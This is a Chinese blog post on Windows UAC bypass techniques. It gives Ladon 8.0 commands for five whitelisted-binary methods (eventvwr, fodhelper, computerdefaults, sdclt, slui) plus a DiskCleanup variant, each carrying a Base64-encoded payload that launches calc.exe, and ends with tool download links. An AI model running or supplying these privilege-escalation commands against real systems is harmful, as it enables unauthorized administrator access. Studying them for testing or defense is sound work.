logo

K8哥哥

没有绝对安全的系统

〖提权〗Ladon 8.0五种白名单方法BypaaUAC

什么是UAC

根据MSDN中的文档,User Account Control(UAC)是在Windows Vista 以后版本中引入的一种安全机制,针对具有有限权限的账户.

通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。

BypassUAC方法

目前公开的绕过UAC的几种方式:

1.各类的UAC白名单程序的DLL劫持
2.各类自动提升权限的COM接口利用(Elevated COM interface)
3.Windows 自身漏洞提权
4.远程注入

UACME: https://github.com/hfiref0x/UACME,内含60+种BypassUAC的方法,有兴趣可自行研究

利用白名单

如果进程本身具有管理员权限或者可以直接获取管理员权限的话,就不会弹出UAC框让用户确认,这类程序被称为白名单程序,例如:slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe,rundll32.exe,explorer.exe等等。

Ladon 8.0

[+] BypassUac 五种方法UAC提权(非交互式执行Base64加密CMD命令)
用法Ladon BypassUac

eventvwr
fodhelper
computerdefaults
sdclt
slui

[+] BypassUac2 eventvwr方法执行明文cmd命令(即8.0前的bypassUAC)

Ladon用法

1
2
3
4
5
6
7
Load BypassUAC
Usage:
Method: eventvwr, fodhelper,computerdefaults, sdclt, slui
Default Bypass Method is eventvwr
Ladon BypassUAC Method Base64Cmd
Example:
Ladon BypassUAC eventvwr Y2FsYw==

Base64Cmd: 使用Ladon8.0 GUI版EnCode模块里的Base64Encode加密

Example

Example usage for eventvwr bypass to launch calc.exe

1
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for fodhelper bypass to launch calc.exe

1
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for computerdefaults bypass to launch calc.exe

1
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for sdclt bypass to launch calc.exe

1
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Note: this appears to only work on Windows 10 in my testing

Example usage for slui bypass to launch calc.exe

1
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl

Example usage for DiskCleanup bypass to launch calc.exe

1
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==

Ladon下载

LadonGo3.4: https://github.com/k8gege/LadonGo
PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
Ladon 7.0版本:http://k8gege.org/Download
Ladon 8.0版本:K8小密圈

扫码加入K8小密圈